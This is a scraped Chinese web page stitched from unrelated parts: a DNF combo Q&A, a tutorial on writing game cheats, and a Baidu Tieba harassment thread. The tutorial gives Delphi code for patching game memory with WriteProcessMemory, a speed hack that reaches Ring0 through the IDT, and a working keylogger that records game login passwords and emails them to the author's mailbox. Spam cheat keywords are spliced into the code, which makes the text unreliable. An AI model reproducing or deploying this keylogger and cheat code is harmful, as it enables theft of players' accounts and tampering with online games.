游戏列表：　
热门搜索推荐：
友情连接
Copyright 2008 3G门户
版权所有
Email:heling2002cncn@qq.com
Powered Bysdhyxcu8z的日志
2010-07-01 11:39
(分类:
后跳+裂波 才最合适?
　　提问补充：出强有用嘛? 我听别人说 后挑战的时候 根本不可能使出裂波 强制貌似没什么用吧 ?
　　满意***1：
　　你好楼住，后跳+连裂波不是一定成功的要看你自己把握的时间后跳打到人后起身的那一啥发裂波几率大点
　　这个就是后跳打到的瞬间马上裂波，把裂波技能拉在快捷键上，如果用手按住裂波成功几率小，用快捷键好点，最好用的时候先上挑在把人按下去马上后跳接裂波，我经常这样连几率很大，多练练吧，总会有手感的
　　不可能~！后跳根本扯不出裂波？真的要笑了，你可以去看下那些PK视频到底能不能扯,在魔法的作用下
，或者PK找下高手，绝对可以让你看见扯出来的效果
　　满意***2：
　　不可以，对方倒地后跳斩是挑不起来的，裂波更是不行，即使是上挑也只是挑起一点点不可以连裂波的，如果楼主是白手可以用五段斩对付倒地，但是需要等待一会因为高手都会蹲伏。
　　相关问题:
　　DNF剑魂连招,上挑,里鬼,十字,裂波后那人喷出去后该怎么接着连他?
　　DNF我是34剑魂我学了上挑满加强制,龙之谷免费外挂
，三段带强制，裂波带强制，后跳带强制，帮忙用这几个组个连招，要说清楚怎么连？
　　DNF后跳怎样才能拉裂波？
　　DNF后跳斩下来连裂波怎么连(具体的操作)?
　　后跳斩加裂波连招怎么用
　　转载来自于：DNF后跳+连裂波 连招问题 搜搜问问
2010-06-30 10:46
(分类:
　　　　具我所知，本地修改式外挂最典型的应用就是在“精灵”游戏上面，因为公司里有很多同事玩“精灵”，于是我看了一下游戏的数据处理方式，发现它所发送到服务器上的信息是存在于内存当中（我看后第一个感受是：修改这种游戏和修改单机版的游戏没有多大分别，换句话说就是在他向服务器提交信息之前修改了内存地址就可以了），当时我找到了地址于是修改了内存地址，果然，按我的想法修改了地址，让系统自动提交后，果然成功了~~~~~OK，我们就来看看这类外挂是如何制作的。
　　　　在做外挂之前我们要对Windows的内存有个具体的认识，而在这里我们所指的内存是指系统的内存偏移量，也就是相对内存，而我们所要对其进行修改，那么我们要对几个Windows API进行了解，OK，跟着例子让我们看清楚这种外挂的制作和API的应用（为了保证网络游戏的正常运行，我就不把找内存地址的方法详细解说了）。
　　1．首先我们要用FindWindow,知道游戏窗口的句柄，因为我们要通过它来得知游戏的运行后所在进程的ID，下面就是FindWindow的用法：
　　HWND FindWindow(
　　LPCTSTR lpCla Name, // pointer to cla name
　　LPCTSTR lpWindowName // pointer to window name
　　);
　　2．我们GetWindowThreadProce Id来得到游戏窗口相对应进程的进程ID，函数用法如下：
　　DWORD GetWindowThreadProce Id(
　　HWND hWnd, // handle of window
　　LPDWORD lpdwProce Id // addre of variable for proce identifier
　　);
　　3．得到游戏进程ID后，接下来的事是要以最高权限打开进程，所用到的函数OpenProce 的具体使用方法如下：
　　HANDLE OpenProce (
　　DWORD dwDesiredAcce , // acce flag
　　BOOL bInheritHandle, // handle inheritance flag
　　DWORD dwProce Id // proce identifier
　　);
　　在dwDesiredAcce 之处就是设存取方式的地方，它可设的权限很多，我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以，其他的方式我们可以查一下MSDN。
　　4．打开进程后，我们就可以用函数对存内进行操作，在这里我们只要用到WriteProce Memory来对内存地址写入数据即可（其他的操作方式比如说：ReadProce Memory等，我在这里就不一一介绍了），我们看一下WriteProce Memory的用法：
　　BOOL WriteProce Memory(
　　HANDLE hProce , // handle to proce whose memory is written to
　　LPVOID lpBaseAddre , // addre to start writing to
　　LPVOID lpBuffer, // pointer to buffer to write data to
　　DWORD nSize, // number of bytes to write
　　LPDWORD lpNumberOfBytesWritten // actual number of bytes written
　　);
　　5．下面用CloseHandle关闭进程句柄就完成了。
　　　　这就是这类游戏外挂的程序实现部份的方法，好了，有了此方法，我们就有了理性的认识，我们看看实际例子，提升一下我们的感性认识吧，下面就是XX游戏的外挂代码，我们照上面的方法对应去研究一下吧。
　　co t
　　ResourceOffset: dword = $004219F4;
　　resource: dword = 3113226621;
　　ResourceOffset1: dword = $004219F8;
　　resource1: dword = 1940000000;
　　ResourceOffset2: dword = $0043FA50;
　　resource2: dword = 1280185;
　　ResourceOffset3: dword = $0043FA54;
　　resource3: dword = 3163064576;
　　ResourceOffset4: dword = $0043FA58;
　　resource4: dword = 2298478592;
　　var
　　hw: HWND;
　　pid: dword;
　　h: THandle;
　　tt: Cardinal;
　　begin
　　hw := FindWindow('XX', nil);
　　if hw = 0 then
　　Exit;
　　GetWindowThreadProce Id(hw, @pid);
　　h := OpenProce (PROCESS_ALL_ACCESS, false, pid);
　　if h = 0 then
　　Exit;
　　if flatcheckbox1.Checked=true then
　　begin
　　WriteProce Memory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
　　WriteProce Memory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), t
　　t);
　　end;
　　if flatcheckbox2.Checked=true then
　　begin
　　WriteProce Memory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), t
　　t);
　　WriteProce Memory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), t
　　t);
　　WriteProce Memory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), t
　　t);
　　end;
　　Me ageBeep(0);
　　CloseHandle(h);
　　close;
　　这个游戏是用了多地址对所要提交的数据进行了校验，所以说这类游戏外挂制作并不是很难，最难的是要找到这些地址。
　　木马式外挂
　　　　木马式外挂，可能大多像木马吧，是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在，所以今天不得不说一下（我个人是非常讨厌这类外挂的，请看过本文的朋友不要到处乱用此技术，谢谢合作）。要做此类外挂的程序实现方法很多（比如HOOK，键盘监视等技术），因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库，所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视，这个程序用这种技术来实现比较适合。
　　　　在做程序之前我们必需要了解一下程序的思路：
　　　　1、我们首先知道你想记录游戏的登录窗口名称。
　　　　2、判断登录窗口是否出现。
　　　　3、如果登录窗口出现，就记录键盘。
　　　　4、当窗口关闭时，把记录信息，通过邮件发送到程序设计者的邮箱。
　　　　第一点我就不具体分析了，因为你们比我还要了解你们玩的是什么游戏，登录窗口名称是什么。从第二点开始,上挑+后跳斩
，我们就开始这类外挂的程序实现之旅。那么我们要怎么样判断登录窗口虽否出现呢？其实这个很简单，我们用FindWindow函数就可以很轻松的实现了：
　　HWND FindWindow(
　　LPCTSTR lpCla Name, // pointer to cla name
　　LPCTSTR lpWindowName // pointer to window name
　　);
　　实际程序实现中，我们要找到'xx'窗口，就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现，那么我们就可以对键盘信息进行记录了。
　　　　首先，我们用SetWindowsHookEx设置监视日志，而该函数的用法如下：
　　HHOOK SetWindowsHookEx(
　　int idHook, // type of hook to i tall
　　HOOKPROC lpfn, // addre of hook procedure
　　HINSTANCE hMod, // handle of a lication i tance
　　DWORD dwThreadI
　　d // identity of thread to i tall hook for
　　);
　　　　在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数，来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了，具体实现方法为：
　　hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HI tance, 0);
　　而HOOKPROC里的函数就要复杂一点点。
　　function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdc
　　all;
　　begin
　　if findedtitle then file://如果发现窗口后
　　begin
　　if (peventmsg(lparam)^.me age = WM_KEYDOWN) then file://消息等于键盘按下
　　hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lp
　　aram)^.paramH); file://通过keyhookresult（自定义的函数，主要功能是转换截获的消息
　　参数为按键名称。我会在文章尾附上转化函数的）转换消息。
　　if length(hookkey) > 0 then file://如果获得按键名称
　　begin
　　Write(hookkeyFile,龙之谷免费外挂
,hookkey); file://把按键名称写入文本文件
　　hookkey := '';
　　end;
　　end;
　　end;
　　　　以上就是记录键盘的整个过程，简单吧，如果记录完可不要忘记释放呀，UnHookWindowsHookEx(hHook)，而hHOOK,就是创建setwindowshookex后所返回的句柄。我们已经得到了键盘的记录，那么现在最后只要把记录的这些信息发送回来，我们就大功造成了。其实，发送这块并不是很难，只要把记录从文本文件里边读出来，用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下：
　　a ignfile(ReadFile,'hook.txt'); file://打开hook.txt这个文本文件
　　reset(ReadFile); file://设为读取方式
　　try
　　While not Eof(ReadFile) do file://当没有读到文件尾
　　begin
　　Readln(ReadFile,s,j); file://读取文件行
　　body:=body+ 　　end;
　　finally
　　closefile(ReadFile); file://关闭文件
　　end;
　　nmsmtp1.EncodeType:=uuMime; file://设置编码
　　nmsmtp1.PostMe age.Attachments.Text:=''; file://设置附件
　　nmsmtp1.PostMe age.FromAddre :='XXX@XXX.com'; file://设置源邮件地址
　　nmsmtp1.PostMe age.ToAddre .Text:='XXX@XXX.com'; /设置目标邮件地址
　　nmsmtp1.PostMe age.Body.Text:='密码'+' '+body; file://设置邮件内容
　　nmsmtp1.PostMe age.Subject:='pa word'; file://设置邮件标题
　　nmsmtp1.SendMail; file://发送邮件
　　这个程序全部功能已经实现，编编试试。
　　加速型外挂
　　　　原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。
　　　　以前DOS时代玩过编程的人就会马上想到，这很简单嘛不就是直接修改一下8253寄存器嘛，这在以前DOS时代可能可以行得通，但是windows则不然。windows是一个32位的操作系统，并不是你想改哪就改哪的（微软的东东就是如此霸气，说不给你改就不给你改），但要改也不是不可能，我们可以通过两种方法来实现：第一是写一个硬件驱动来完成，第二是用Ring0来实现（这种方法是CIH的作者陈盈豪首用的，它的原理是修改一下IDE表->创建一个中断门->进入Ring0->调用中断修改向量，但是没有办法只能用ASM汇编来实现这一切*_*，做为高级语言使用者惨啦！），用第一种方法用点麻烦，所以我们在这里就用第二种方法实现吧~~~
　　　　在实现之前我们来理一下思路吧。
　　　　1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门，修改向量等工作
　　　　2、调用这个过程来实现加速功能。
　　　　好了，现在思路有了，我们就边看代码边讲解吧。
　　　　首先，我们建立一个过程，这个过程就是本程序的核心部份。
　　procedure SetRing(value:word); stdcall;
　　co t ZDH = $03; //设一个中断号
　　var
　　IDT : array [0..5] of byte; //保存IDT表
　　OG : dword; //存放旧向量
　　begin
　　asm
　　push ebx
　　sidt IDT //读入中断描述符表
　　mov ebx, dword ptr [IDT+2] //IDT表基地址
　　add ebx, 8*ZDH //计算中断在中断描述符表中的位置
　　cli //关中断
　　mov dx, word ptr [ebx+6]
　　shl edx, 16d
　　mov dx, word ptr [ebx]
　　mov [OG], edx
　　mov eax, offset @@Ring0 //指向Ring0级代码段
　　mov word ptr [ebx], ax //低16位,保存在1,2位
　　shr eax, 16d
　　mov word ptr [ebx+6], ax //高16位，保存在6,7位
　　int ZDH //中断
　　mov ebx, dword ptr [IDT+2] //重新定位
　　add ebx, 8*ZDH
　　mov edx, [OG]
　　mov word ptr [ebx], dx
　　shr edx, 16d
　　mov word ptr [ebx+6], dx //恢复被改了的向量
　　pop ebx
　　jmp @@exitasm //到exitasm处
　　@@Ring0: //Ring0,这个也是最最最核心的东东
　　mov al,$34 //写入8253控制寄存器
　　out $43,al
　　mov ax,value　//写入定时值
　　out $40,al //写定时值低位
　　mov al,ah
　　out $40,al //写定时值高位
　　iretd //返回
　　@@exitasm:
　　end;
　　end;
　　　　最核心的东西已经写完了，大部份朋友是知其然不知其所以然吧，呵呵，不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧！
　　　　先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上：
　　SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));
　　　　因为windows默认的值为$1742，所以我们把1742做为基数，又因为值越小越快，反之越慢的原理，所以写了这样一个公式，好了，这就是“变速齿轮”的一个Delphi＋ASM版了（只适用于win9X），呵呵，试一下吧，这对你帮助会很大的，呵呵。
　　　　在win2000里，我们不可能实现在直接对端口进行操作，Ring0也失了效，有的人就会想到，我们可以写驱动程序来完成呀，但在这里我告诉你，windows2000的驱动不是一个VxD就能实现的，像我这样的低手是写不出windows所用的驱动WDM的，没办法，我只有借助外力实现了，ProtTalk就是一个很好的设备驱动，他很方便的来实现对低层端口的操作，从而实现加速外挂。
　　1．我们首先要下一个PortTalk驱动，他的官方网站是http://www.beyondlogic.org
　　2．我们要把里面的prottalk.sys拷贝出来。
　　3．建立一个Protalk.sys的接口求救：谁能救我送他3000G币！
进入贴吧
贴子搜索 |
浏览贴子
吧主： 共有
求救：谁能救我送他3000G币！
我的号里有两个人天天吸我经验还骚扰我，但记录上不显示他的名字，点不住他，加不了黑，女马 的吸了还骚扰，卡着点吸我，有办法的留言加QQ号，如果办法可行的，定送上3000G币！
2010-7-26 08:26
好友都删完啦，他有我好友，我没他好友。
2010-7-26 08:29
随风消逝
你去p他、p到他不吸、哈哈、
2010-7-26 08:59
211.138.184.*
用自带浏览器上就能看见了
2010-7-26 13:05
124.89.8.*
用自带浏览器上就能看见了
2010-7-26 13:05
211.138.184.*
要还不行的话你加我704727144，我再帮你弄，加的时候注明一下。不要你GB那东西没用
2010-7-26 13:10
124.89.8.*
要还不行的话你加我704727144，我再帮你弄，加的时候注明一下。不要你GB那东西没用
2010-7-26 13:10
218.201.200.*
哈哈，没名字的号…
2010-7-26 13:30
在电脑上拉黑他们
2010-7-26 14:01
211.142.189.*
电脑上也不显示
2010-7-27 23:04
117.136.16.*
他吸你的时候点他名字，然后看他信息，上面有加黑
2010-7-28 01:35
211.142.189.*
他根本就没名字，点不住他。
2010-7-28 12:56
112.240.137.*
我现在都渴望着别人可劲吸我可劲骚扰我
2010-7-31 22:26
名字貌似是【】
我看过，他也吸过我的功，还打我
2010-8-1 11:41
211.144.82.*
这位朋友你去他家园,里面有加入黑名单的,还有一个办法,你再加他为好友,这样重新加黑就行了,我就是的,最好去他家园里面.我不要币,自己都3万多了.我 68级了.每天吸30人.
2010-8-1 14:14
我73J压经验。
2010-8-1 17:04
我告诉你个好方法、 哈哈 换小号练
。。哈哈、 或者 你就别耍了 嘿嘿
2010-8-2 18:56
120.84.27.*
首先找到他的Q名(可以尝试在农场找)，找到后，把那个Q号加好友，加了再拉黑，后删！
2010-8-3 06:55
211.137.33.*
你把家园好友都删了就可以了，知道什么是家园好友不？不知道当我没说，令求互吸互扰292797109
2010-8-3 12:06
124.116.39.*
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
精武堂帮：『星耀会』帮号：261118 ，不逼不T，本帮缺人，速进！！
2010-8-3 14:55
G币不是不能转吗？
2010-8-3 14:57
Taylover
GB无价值
2010-8-4 14:31
潜力帮3c倾城之恋ID262808火热招矿工、活跃玩家，贡高堂主！0d0a也许那名字留空了，很短，仔细点就能发现他了！
2010-8-5 08:11
202.104.3.*
自己也象他一样
2010-8-15 17:05
分享次数：
分享到:
发表回复
内　容:
用户名:
您目前是匿名发表
验证码:
请点击后输入验证码，加入会员后本吧发贴免验证码。 Ctrl+Enter快捷发表 2011 Baidu